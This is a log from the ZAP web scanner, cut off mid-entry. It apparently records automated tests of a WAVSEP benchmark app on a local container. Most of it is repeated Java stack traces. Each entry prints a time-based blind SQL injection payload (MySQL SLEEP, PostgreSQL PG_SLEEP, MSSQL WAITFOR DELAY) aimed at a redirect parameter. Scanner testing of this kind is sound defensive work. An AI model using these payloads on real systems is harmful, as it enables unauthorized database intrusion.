[ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com AND (SELECT * FROM (SELECT(SLEEP(5)))xaDj)-- xLxo] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com AND (SELECT * FROM (SELECT(SLEEP(5)))xaDj)-- xLxo at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681712 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) AND 9048=(SELECT 9048 FROM PG_SLEEP(5)) AND (9300=9300] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) AND 9048=(SELECT 9048 FROM PG_SLEEP(5)) AND (9300=9300 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681712 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND (SELECT * FROM (SELECT(SLEEP(5)))JiSk) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND (SELECT * FROM (SELECT(SLEEP(5)))JiSk) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681713 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com AND 9250=(SELECT 9250 FROM PG_SLEEP(5))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com AND 9250=(SELECT 9250 FROM PG_SLEEP(5)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681714 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))wYHc)-- DaWT] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))wYHc)-- DaWT at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681715 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 5456=(SELECT 5456 FROM PG_SLEEP(5)) AND (4564=4564] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 5456=(SELECT 5456 FROM PG_SLEEP(5)) AND (4564=4564 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681715 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') AND 3117=(SELECT 3117 FROM PG_SLEEP(5)) AND ('yIGh'='yIGh] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') AND 3117=(SELECT 3117 FROM PG_SLEEP(5)) AND ('yIGh'='yIGh at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681716 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' AND 8584=(SELECT 8584 FROM PG_SLEEP(5)) AND 'ojnG'='ojnG] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' AND 8584=(SELECT 8584 FROM PG_SLEEP(5)) AND 'ojnG'='ojnG at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681717 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 2440=(SELECT 2440 FROM PG_SLEEP(5))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 2440=(SELECT 2440 FROM PG_SLEEP(5)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681717 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 3478=(SELECT 3478 FROM PG_SLEEP(5)) AND ('SeVf'='SeVf] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 3478=(SELECT 3478 FROM PG_SLEEP(5)) AND ('SeVf'='SeVf at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681718 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com%' AND 3959=(SELECT 3959 FROM PG_SLEEP(5)) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com%' AND 3959=(SELECT 3959 FROM PG_SLEEP(5)) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681719 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com AND 3148=(SELECT 3148 FROM PG_SLEEP(5))-- EJyK] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com AND 3148=(SELECT 3148 FROM PG_SLEEP(5))-- EJyK at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681720 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 5014=(SELECT 5014 FROM PG_SLEEP(5)) AND 'cvuS'='cvuS] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 5014=(SELECT 5014 FROM PG_SLEEP(5)) AND 'cvuS'='cvuS at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681721 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 9735=(SELECT 9735 FROM PG_SLEEP(5)) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 9735=(SELECT 9735 FROM PG_SLEEP(5)) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681722 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (2839=2839] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com) WAITFOR DELAY 